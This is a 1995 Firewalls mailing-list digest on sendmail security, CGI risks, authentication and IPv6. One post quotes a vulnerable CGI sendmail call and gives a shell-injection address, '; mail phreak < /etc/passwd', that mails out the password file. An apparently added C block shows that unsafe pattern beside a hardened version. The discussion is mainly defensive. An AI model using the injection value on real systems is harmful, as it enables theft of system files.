Depends on your definition. Read the Berferd paper for inspiration--lots of effort and thought has gone into designing protection schemes that not only provide a level of securable transaction support but also provide a reporting and tracking mechanism (sometimes called a 'tar-baby' or 'yellow sticky' paradigm--thanks marcus...) that attempts to educate the administrator not only when an attack is occurring, but leave behind breadcrumbs as the cretin is trying.

Digressive example: Any fixed fortification such as a Maginot line is a strong defense against a point-source attack. Witness the center of the Union line at Gettysburg on the 3rd day and the effect on Pickett's division, or Fredericksburg the previous December and the effect on Burnside's boys. One would dare take that example, perchance, as a model for firewall design at the service level (telnet, ftp, hypedtext, news, etc), with the proviso that by enlarging the model to *acknowledge* flanking maneuvers by determined foemen, we could resist a determined focused charge at our stone wall, while protecting the flanks, AND giving us time to alert the messengers and get the rest of the defense into line.
(Yes, sometimes you have to look on firewall and system security in a militaristic vein...not all lessons are learned from O'Reilly...:)...besides, it will make you more widely read...;))

>
> At the risk of being Yet Another Security Pinhead, this is the Wrong
> Thing To Do. If we think that the number of clueless boneheaded application
> developers is much larger than the number of clueless boneheaded kernel
> developers, then The Right Thing To Do is to put general security hooks in
> the kernel.

There is already that ongoing problem, since the first corporate auditor bumped heads with the first apps programmer. Throw in a bit of whining about creative freedom and the like. One must assume, in any case, that the application code cranker or the kernel guru is only interested in *their* narrow focus. As a net admin, we are the ones that have to define, no matter what smells and bells they add in the realm of creeping featuritis, what the limits of their operation in the hands of the GUP (great unwashed population) will be.

>
> I'm fairly optimistic about something like IPSec combined with TCP wrappers;
> IPSec prevents anonymity, and the wrappers give you a modicum of access
> control. Let's fix it once (at the common - i.e. IP level), rather than
> having a million RFCs for "Privacy Enhanced Gopher".

How about the other way: define the boundaries and then write the code (gasp!...:))

>
> Then, if I STILL want to allow someone access into my system, I can't go
> crying to anyone when he zaps my disk partitions ...

Absolutely. Never assume that giving a specific user access will ensure that user will not look out for his own amusement rather than your operation... keeps us in business, anyway...

Just my $.02
--
Bryan D. Boyle | Thru the gateway, off the router, over the T-1
#include | backbone, nothing but 'Net...
EMAIL: bdboyle@erenj.com | :)
---------------------------------- --------------------

From firewalls-owner Thu Sep 14 09:32:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13161 for firewalls-outgoing; Thu, 14 Sep 1995 09:18:56 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA13154 for ; Thu, 14 Sep 1995 09:18:51 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09694; Thu, 14 Sep 95 12:13:59 -0400
Date: Thu, 14 Sep 95 12:13:58 -0400
Message-Id: <9509141613.AA09694@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: User Authentication & encryption
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Bill rites:
>I've been told that most companies are piling their resources
>(buck) on the authentication and not using traffic encryption because
>they feel that session assumption is really more difficult than one
>would be led to believe and encryption represents considerable overhead.

Well I have been pushing full encryption for *both* protection of data and strong authentication for years now and hallelujah I think we have turned the corner. The Netscape Commerce server is the best reason I have seen to buy Netscape stock.
Warmly, Padgett (I will take EBCDIC in vein no more, forever) From firewalls-owner Thu Sep 14 09:39:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA12269 for firewalls-outgoing; Thu, 14 Sep 1995 09:01:10 -0700 Received: from goole.octacon.co.uk (goole.octacon.co.uk [193.118.80.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA12262 for ; Thu, 14 Sep 1995 09:00:56 -0700 Received: from potato (potato.octacon.co.uk [193.118.80.27]) by goole.octacon.co.uk (8.6.9/8.6.9) with SMTP id QAA21599 for ; Thu, 14 Sep 1995 16:58:19 +0100 Date: Thu, 14 Sep 1995 16:42:07 +0100 (BST) From: Stefan Thatcher Subject: WWW - http - cgi_scripts To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, not sure whether this is a Firewall query, but here goes - The powers that be have decreed that a WWW server be set up to allow individuals to write their own pages on it :-) Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain at the thought of untamed cgi's roaming the country-side (:-o I'd sure appreciate any advice, pointers, tips etc before setting out on this long and lonely road /:-) TIA Stefan -------------------------------------------------------------------------------- Stefan Thatcher v: +44 (0)1642 210 087 Octacon Ltd. 
f: +44 (0)1642 210 518 York House, e: Stefan.Thatcher@octacon.co.uk 102,108 Borough Road, Middlesbrough, Cleveland TS1 2HJ UK -------------------------------------------------------------------------------- From firewalls-owner Thu Sep 14 10:02:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA13588 for firewalls-outgoing; Thu, 14 Sep 1995 09:33:09 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA13581 for ; Thu, 14 Sep 1995 09:33:05 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA29354 for greatcircle.com!firewalls; Thu, 14 Sep 1995 11:20:25 -0500 Received: by ris1.nmti.com (smail2.5) id AA07028; 14 Sep 95 10:49:43 CDT (Thu) Received: by sonic.nmti.com; id AA24527; Thu, 14 Sep 1995 11:16:28 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509141616.AA24527@sonic.nmti.com.nmti.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Thu, 14 Sep 1995 11:16:27 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <199509141427.JAA17333@shade.sctc.com> from "Rick Smith" at Sep 14, 95 09:27:19 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 635 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > True enough. The point is, you have to identify and exploit > appropriate holes in both sendmail and in the nonbypassible access > control mechanism of the OS. A properly designed mechanism is going to > present a different kind of penetration problem. The point is that if you have a class B O/S you're more likely to skimp on the application level stuff. If you get both, that's great, but you usually only get one. I just found another: sprintf(txt, "sendmail -f %s %s < %s", user_provided_string, server_provided_string, tempname); in a web server CGI script. Just pop "; mail phreak < /etc/passwd" in as your address... 
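The CGI fragment Peter quotes above is a shell command injection: whatever the user typed is pasted into a command line that `system()` hands to `/bin/sh`, so shell metacharacters in the "address" become commands. The following is an added illustration, not code from the original post or from any web server of the time. It shows the unsafe construction next to a hardened version that whitelists the address characters and runs the MTA through `fork()`/`execv()` with an argv array, so no shell ever parses user input. The function names, the `/usr/sbin/sendmail` path, and the sample addresses are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>

/* Assumed MTA location for this example; not taken from the post. */
#define SENDMAIL_PATH "/usr/sbin/sendmail"

/* The pattern from the post: the user string is pasted into a shell command
 * line. snprintf() only fixes the buffer overflow; the injection remains,
 * because the resulting string is still meant for a shell. */
int build_unsafe_command(char *txt, size_t len, const char *user_addr,
                         const char *server_addr, const char *tempname)
{
    int n = snprintf(txt, len, "sendmail -f %s %s < %s",
                     user_addr, server_addr, tempname);
    return (n >= 0 && (size_t)n < len) ? 0 : -1;
}

/* Helper showing that metacharacters pass straight through the unsafe path:
 * returns 1 if the built command line contains `needle`. */
int unsafe_command_contains(const char *user_addr, const char *needle)
{
    char txt[512];
    if (build_unsafe_command(txt, sizeof txt, user_addr,
                             "owner@example.com", "/tmp/msg.txt") != 0)
        return 0;
    return strstr(txt, needle) != NULL;
}

/* Conservative whitelist for an envelope address: letters, digits and a few
 * punctuation characters found in ordinary addresses. Everything a shell
 * cares about (; | & ` $ < > space, quotes, newlines) is rejected, and so is
 * a leading '-' that sendmail might parse as an option. */
int address_is_safe(const char *addr)
{
    size_t i, n = strlen(addr);
    if (n == 0 || n > 254 || addr[0] == '-')
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!(isalnum(c) || strchr("@._-+", c)))
            return 0;
    }
    /* exactly one '@', with something on both sides */
    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@'))
        return 0;
    return 1;
}

/* Hardened version: validate both addresses, then exec the MTA directly with
 * an argv array and stdin redirected from the spool file. Without a shell
 * in the path, ';' or '|' in an argument would be ordinary characters even
 * if the whitelist had not already rejected them. Returns 0 on success. */
int send_via_sendmail(const char *user_addr, const char *server_addr,
                      const char *tempname)
{
    if (!address_is_safe(user_addr) || !address_is_safe(server_addr))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(tempname, O_RDONLY);
        if (fd < 0 || dup2(fd, STDIN_FILENO) < 0)
            _exit(127);
        close(fd);
        char *const argv[] = { "sendmail", "-f", (char *)user_addr,
                               (char *)server_addr, NULL };
        execv(SENDMAIL_PATH, argv);
        _exit(127);            /* only reached if execv() failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(void)
{
    /* Constructed sample inputs: one ordinary address, two hostile ones. */
    const char *samples[] = { "alice@example.com", "a;b@example.com",
                              "-oQ/tmp@example.com" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s %s\n", samples[i],
               address_is_safe(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```

The whitelist is deliberately narrower than what RFC 822 permits; for a CGI front end that is the right trade, since the goal is to keep the input from ever being interpreted by anything other than the MTA's address parser.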
From firewalls-owner Thu Sep 14 10:29:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA12902 for firewalls-outgoing; Thu, 14 Sep 1995 09:12:26 -0700
Received: from osshe.edu (OSSHE.EDU [140.211.10.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA12895 for ; Thu, 14 Sep 1995 09:12:23 -0700
Received: from sparky.oit.osshe.edu (sparky.OIT.OSSHE.EDU [140.211.71.3]) by osshe.edu (8.6.5/8.6.5) with ESMTP id JAA16801; Thu, 14 Sep 1995 09:10:58 -0700
Received: from ip-davin.oit.osshe.edu (ip-davin.oit.osshe.edu [140.211.84.203]) by sparky.oit.osshe.edu (8.6.12/8.6.12) with SMTP id JAA10872; Thu, 14 Sep 1995 09:08:31 -0700
Date: Thu, 14 Sep 1995 09:09:13 -0900 (PDT)
From: Davin Petersen
To: "John G. Thompson"
cc: Rick Smith , firewalls@GreatCircle.COM
Subject: Re: Secure version of Sendmail
X-Sender: davin@mail.oit.osshe.edu
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 13 Sep 1995, John G. Thompson wrote:
> > ..Sendmail is the only useful mail package out there. I'd be happy
> > to adopt anything which offers me Sendmail functionality in a more secure
> > fashion....
>
> Have you honestly looked at smail?

The last time I personally used smail, I discovered a bug that allowed anyone (using a long series of cryptic command line args) to write a 0 length file _anywhere_ in the filesystem. Perhaps /etc/passwd as a possible target? At that time I also learned that problems like this were cropping up all the time in smail. I moved to Sendmail 8.6.12 and have been very happy. Don't be worried about rewriting rules or anything like that. The BEST method of learning sendmail and SMTP mail management is to start with O'Reilly's "Bat" book titled "Sendmail". It did wonders for me, at the time a newbie to mail management. There is also quite a bit of name hiding that you can do in sendmail.
my $0.02
Davin Petersen

From firewalls-owner Thu Sep 14 10:31:10 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15897 for firewalls-outgoing; Thu, 14 Sep 1995 10:14:11 -0700
Received: from maildrop.micrognosis.com (supernova.micrognosis.com [192.233.13.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA15884 for ; Thu, 14 Sep 1995 10:14:05 -0700
Received: by maildrop.micrognosis.com (4.1/SMI-4.1) id AA03922; Thu, 14 Sep 95 13:12:48 EDT
Received: from singhi.corp.micrognosis.com(193.32.166.28) by supernova.micrognosis.com via smap (V1.3) id sma003912; Thu Sep 14 13:12:21 1995
Received: from becks (becks.corp.micrognosis.com) by corp.micrognosis.com (4.1/1.0-integ.cf) id AA09992; Thu, 14 Sep 95 13:15:25 EDT
Date: Thu, 14 Sep 1995 13:15:20 -0400 (EDT)
From: Adam Jack
X-Sender: ajack@becks
To: Stefan Thatcher
Cc: firewalls@greatcircle.com
Subject: Re: WWW - http - cgi_scripts
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Stefan,

On Thu, 14 Sep 1995, Stefan Thatcher wrote:
> Sounds OK but little bells have started ringing in the malicious.paranoia.uk
> domain at the thought of untamed cgi's roaming the country-side (:-o

Consider the WN server - freely available at : http://hopf.math.nwu.edu/

We run it with FORBID_CGI set - i.e. CGI disallowed. It also is pretty security conscious.

If that isn't a possibility - ensure that whatever mechanism you allow for mirroring user HTML trees to the server - you remove all executable permissions.
Adam -- +1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html From firewalls-owner Thu Sep 14 10:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16200 for firewalls-outgoing; Thu, 14 Sep 1995 10:18:55 -0700 Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA16193 for ; Thu, 14 Sep 1995 10:18:48 -0700 Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA26904; Thu, 14 Sep 95 18:17:23 BST Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma026901; Thu Sep 14 18:16:27 1995 Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA27452; Thu, 14 Sep 95 18:16:25 BST From: nreadwin@london.micrognosis.com (Neil Readwin) Message-Id: <9509141716.AA27452@zeus.london.micrognosis.com> Subject: Re: User Authentication To: frankw@in.net (Frank Willoughby) Date: Thu, 14 Sep 1995 18:16:24 +0100 (BST) Cc: firewalls@GreatCircle.com In-Reply-To: <9509131934.AA21430@su1.in.net> from "Frank Willoughby" at Sep 13, 95 03:34:49 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 798 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I was surfing on the net one day and stumbled onto one with a slick > user I/F where you can watch the net traffic & just hit a key to take > over the session. That presupposes that the traffic is going past you. Most of the "interesting" traffic going through my firewall just makes a dozen or so hops across networks run by our IP providers before disappearing into another firewall. Unless you are snooping on the transit networks you cannot steal the session from the outside. Of course HTTP traffic goes everywhere, but I don't care if you start faking Web pages for my users :-) Neil. PS Can we stop with the shell programming and assembler? Pretty please? 
-- nreadwin@micrognosis.co.uk Phone: +1 908 855 1221 x519 Anything is a cause for sorrow that my mind or body has made From firewalls-owner Thu Sep 14 10:52:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14580 for firewalls-outgoing; Thu, 14 Sep 1995 09:51:41 -0700 Received: from atdesk.atdesk.com (sl02-030.sunbelt.net [165.166.1.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA14554 for ; Thu, 14 Sep 1995 09:51:31 -0700 Date: Thu, 14 Sep 1995 09:51:31 -0700 Received: from zork.atdesk.com by atdesk.atdesk.com id aa16600; 14 Sep 95 12:50 EDT X-Sender: del@atdesk.atdesk.com X-Mailer: Windows Eudora Light Version 1.5.2b1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: David Lupo Subject: Re: MVS vs the world Message-ID: <9509141250.aa16600@atdesk.atdesk.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >In Firewalls-Digest V4 #526 Warren Moore replied to cjolley@iac.net: > >> I still have mine, but it does not explain what the following code does: >> > > BALR 3,0 > > > > BALR 3,3 > >It's been 20 or so years, but without seeing it could be >anything from a basic parsing routine (Reg 0 & 1 were typically input), to a >realllly tight loop. > Ah, that brings back memories! What an elegant two-pass loop! BranchAndLinkRegister (normally used for subroutine calls) puts the return address (address of the following instruction) in the first register and branches to the address in the second, unless the second is zero, in which case it does not branch. 
--------------------------------------------------------
David Lupo (davidlupo@acm.org, del@atdesk.com)
Automated Trading Desk voice: (803) 884-9191
Mount Pleasant, South Carolina fax: (803) 884-9140

From firewalls-owner Thu Sep 14 11:02:51 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14049 for firewalls-outgoing; Thu, 14 Sep 1995 09:43:37 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA14034 for ; Thu, 14 Sep 1995 09:43:31 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09841; Thu, 14 Sep 95 12:33:13 -0400
Date: Thu, 14 Sep 95 12:33:12 -0400
Message-Id: <9509141633.AA09841@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Firewall off Rod McBan DCLVI
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> This is already done with the Sega channel, no? Only the medium is
>different. My, I wish I had time to experiment with this sort of thing.. ;)

>Speaking of billing problems, anyone read your comp.protocols.tcp-ip.domains
>lately?

Again take a close look at the Netscape Commerce server. I presented a way a couple of years ago to use asymmetric encryption to pass financial info over the net using ITAR-legal client software and they seem to have picked up on that 8*).

What I am seeing is that a lot of development has been going on even though the fed. has blocked its commercial release with threat of ITAR (mainly by persecuting Phil - no I used the rite word). Enough is starting to leak through the cracks that the minute the gov allows 64 bits instead of 40 (and I do not understand how that is relevant to RSA anyway) there is going to be a major shift in how the net is used. All of the pieces are there and let the dam spring just one little hole...
Warmly, Padgett ps still can say "EBCDIC is not encryption" 8*). From firewalls-owner Thu Sep 14 11:02:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18132 for firewalls-outgoing; Thu, 14 Sep 1995 10:47:53 -0700 Received: from argo.hks.com (argo.hks.com [192.156.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18115 for ; Thu, 14 Sep 1995 10:47:45 -0700 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id RAA12169 for <@hks.com:firewalls@GreatCircle.COM>; Thu, 14 Sep 1995 17:46:28 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) for firewalls@GreatCircle.COM id NAA12153; Thu, 14 Sep 1995 13:46:27 -0400 From: "Jim Littlefield" Message-Id: <9509141346.ZM12151@ragnarok.hks.com> Date: Thu, 14 Sep 1995 13:46:27 -0400 In-Reply-To: Stefan Thatcher "WWW - http - cgi_scripts" (Sep 14, 4:42pm) References: X-Mailer: Z-Mail (3.2.1 15feb95) To: firewalls@GreatCircle.COM Subject: Re: WWW - http - cgi_scripts Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 14, 4:42pm, Stefan Thatcher wrote: : Hi, : not sure whether this is a Firewall query, but here goes - : : The powers that be have decreed that a WWW server be set up to allow individuals : to write their own pages on it :-) : Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain : at the thought of untamed cgi's roaming the country-side (:-o : I'd sure appreciate any advice, pointers, tips etc before setting out on this long : and lonely road /:-) You may have answered your own question--disable cgi's for the "general public". -- Jim Littlefield "Soon anyone who's not on the World Wide Web will qualify for a government subsidy for the home-pageless." 
- Scott Adams

From firewalls-owner Thu Sep 14 11:17:27 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18319 for firewalls-outgoing; Thu, 14 Sep 1995 10:51:30 -0700
Received: from spchp46.BBN.COM (SPCHP46.BBN.COM [128.89.4.149]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18311 for ; Thu, 14 Sep 1995 10:51:26 -0700
Received: by spchp46.BBN.COM (1.37.109.16/16.2) id AA038486347; Thu, 7 Sep 1995 13:52:27 -0400
Date: Thu, 7 Sep 1995 13:52:26 -0400 (EDT)
From: Christopher Osborn
To: Stefan Thatcher
Cc: firewalls@greatcircle.com
Subject: Re: WWW - http - cgi_scripts
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 14 Sep 1995, Stefan Thatcher wrote:
> Hi,
> not sure whether this is a Firewall query, but here goes -
>
> The powers that be have decreed that a WWW server be set up to allow individuals
> to write their own pages on it :-)
> Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain
> at the thought of untamed cgi's roaming the country-side (:-o
> I'd sure appreciate any advice, pointers, tips etc before setting out on this long
> and lonely road /:-)
>
> TIA Stefan

Configure your WWW server to forbid CGI scripts in the users' directories. Check out http://hoohoo.ncsa.uiuc.edu/docs/tutorials/user.html (something like Options NONE for that directory).

Users can run "safe" cgi from a central depository on your WWW server that YOU control. All cgi must be approved in order to be placed in this area. Also think about running perl -t (perl 5.0) or taintperl (4.036) in order to limit access to the file system. Check out cgi-wrap (can't remember the URL) as well.

CGI can possibly create not just security nightmares but also bring down your server, so review submitted cgi scripts carefully.
The WWW security FAQ has all the details you may need (http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq).

> --------------------------------------------------------------------------------
> Stefan Thatcher v: +44 (0)1642 210 087

+======================================================================+
Christopher Osborn cosborn@bbn.com
WWW/BBS Site Engineer EMail ^^ for Public Key
Bolt, Beranek, and Newman, INC. http://www.spc.bbn.com/
Software Products
My opinions may or may not reflect the views of my employer.

From firewalls-owner Thu Sep 14 11:31:27 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18846 for firewalls-outgoing; Thu, 14 Sep 1995 11:00:56 -0700
Received: from arthur.cs.purdue.edu (arthur.cs.purdue.edu [128.10.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18839 for ; Thu, 14 Sep 1995 11:00:52 -0700
Received: from narnia.cs.purdue.edu (swlodin@narnia.cs.purdue.edu [128.10.17.74]) by arthur.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) with ESMTP id ; Thu, 14 Sep 1995 12:59:26 -0500
Received: (swlodin@localhost) by narnia.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) id ; Thu, 14 Sep 1995 12:59:22 -0500
From: "Steven W. Lodin"
Message-Id: <9509141259.ZM1593@narnia.cs.purdue.edu>
Date: Thu, 14 Sep 1995 12:59:20 -0500
In-Reply-To: gary flynn "Re: Firewall off Mortal Kombat XIV" (Sep 14, 10:48am)
References: <199509141449.HAA08346@miles.greatcircle.com>
X-Face: Mx\#!$C!&CSez|Z]d^0t`P#ZJlPoyC#zJN;#4nwe8h4-rnXL-2>=!if`{Pi-*s^"vRs}SK]oA(n<(QS:gHZ%CX+Kq~It<%Glg~r_mv2*-l]x+19x*wHC]ON}`47?]4{9>^w^S~/JxeEF!npYd1CLIp@}fA6|L~A:rBAuLlkfoQ~SlAIZsIkTrqFw5$uN4#P^Tga+BLOg
X-Mailer: Z-Mail (3.2.0 06sep94)
To: gary flynn
Subject: IPv6 (was Re: Firewall off Mortal Kombat XIV)
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sep 14, 10:48am, gary flynn wrote:
>
> Can someone point me to a site that can tell me the progress of IPv6...
> both the protocols and implementations?

http://playground.sun.com/pub/ipng/html/ipng-main.html

This site has info on working groups, specifications, and implementations. It seems fairly current.
Steve
--
Steve Lodin
Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin
Delco Electronics - swlodin@delcoelect.com (317)451-0479
Home - swlodin@iquest.net http://www.iquest.net/~swlodin/

From firewalls-owner Thu Sep 14 12:02:56 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA21422 for firewalls-outgoing; Thu, 14 Sep 1995 11:59:27 -0700
Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA21408 for ; Thu, 14 Sep 1995 11:59:19 -0700
From: Mark_W_Loveless@smtp.bnr.com
Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA23075; Thu, 14 Sep 95 13:58:00 CDT
Received: from cc:Mail by smtp.bnr.com id AA811112277; Thu, 14 Sep 95 13:49:46 CST
Date: Thu, 14 Sep 95 13:49:46 CST
Message-Id: <9508148111.AA811112277@smtp.bnr.com>
To: firewalls@greatcircle.com
Subject: Firewalls/Plus
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Upper management went to a trade show and was very interested in Firewalls/Plus, an MS-DOS based firewall. Does anyone have any info regarding how easy/reliable/workable this thing is? I have been charged with info gathering against my will (God bless trade shows). No advertising, I've already received the brochures. I'm curious to get any real world experience from a non-Unix non-router solution like this anyway...
Mark

From firewalls-owner Thu Sep 14 12:07:10 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19575 for firewalls-outgoing; Thu, 14 Sep 1995 11:16:34 -0700
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA19568 for ; Thu, 14 Sep 1995 11:16:30 -0700
Received: from pm1-03.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA09922; Thu, 14 Sep 95 13:14:40 -0400
Date: Thu, 14 Sep 95 13:14:40 -0400
Message-Id: <9509141714.AA09922@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: frankw@in.net (Frank Willoughby)
Subject: Re: Secure version of Sendmail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>> Of course a class B operating system is itself a large, capable, general
>> purpose package.
>
> True enough. The point is, you have to identify and exploit
> appropriate holes in both sendmail and in the nonbypassable access
> control mechanism of the OS. A properly designed mechanism is going to
> present a different kind of penetration problem.

If I remember right, the Orange Book does *not* permit classified and unclassified users on the same system - even if the system has been certified as A1. Probably for good reason.

In my experience in the information security field, there is no such thing as a "nonbypassable access control mechanism" of an O/S. Anything can be compromised. It is a simple matter of how much time, manpower, resources, and/or money you are willing to spend to accomplish your objective.

As far as the penetration problem goes, it depends on what type of environment you are dealing with. If the target is a host, there is a significant penetration problem when dealing with sendmail.
However, if the target is an application gateway (firewall), then the penetration attack is handled at the application layer & (if done right - which most reputable firewall vendors do) the attack never gets to the O/S. We are assuming of course, that we haven't lost our common sense (and our minds) by allowing users to have accounts on our firewall. Definitely not a good idea - even if the system were A1 certified (a la Orange Book).

%< [snip] (extra stuff deleted)

Best Regards,

Frank

> Rick.
> smith@sctc.com secure computing corporation

From firewalls-owner Thu Sep 14 12:07:37 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18561 for firewalls-outgoing; Thu, 14 Sep 1995 10:55:13 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18553 for ; Thu, 14 Sep 1995 10:55:06 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id MAA01265 for ; Thu, 14 Sep 1995 12:57:11 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 003340000; 14 Sep 95 13:54 CDT
Received: from sctc.com by sccmailhost.sctc.com id 074540000; 14 Sep 95 13:53 CDT
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id MAA28182; Thu, 14 Sep 1995 12:53:39 -0500
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA01801; Thu, 14 Sep 1995 12:53:39 -0500
Date: Thu, 14 Sep 1995 12:53:39 -0500
From: Rick Smith
Message-Id: <199509141753.MAA01801@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: Firewall off Mortal Kombat XIV
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

For the record, I'm not opposed to deploying IP level security measures. But I don't think they're any sort of panacea. The cost benefit tradeoff won't always tip towards IP layer crypto.
> william.wells wrote:
>> As for the comment about being 'behind the curve'. The example I use
>> is NFS. It was written to fill a niche and has blossomed into code
>> supported on most any TCP/IP system. There are more secure replacements
>> available but critical mass and lack of widespread support assures
>> they won't generally be used.
...

Ted Doty writes:
> Yet ANOTHER reason to do it in IP. If my mount program is brain damaged,
> and does silliness like exporting everything to the world because my
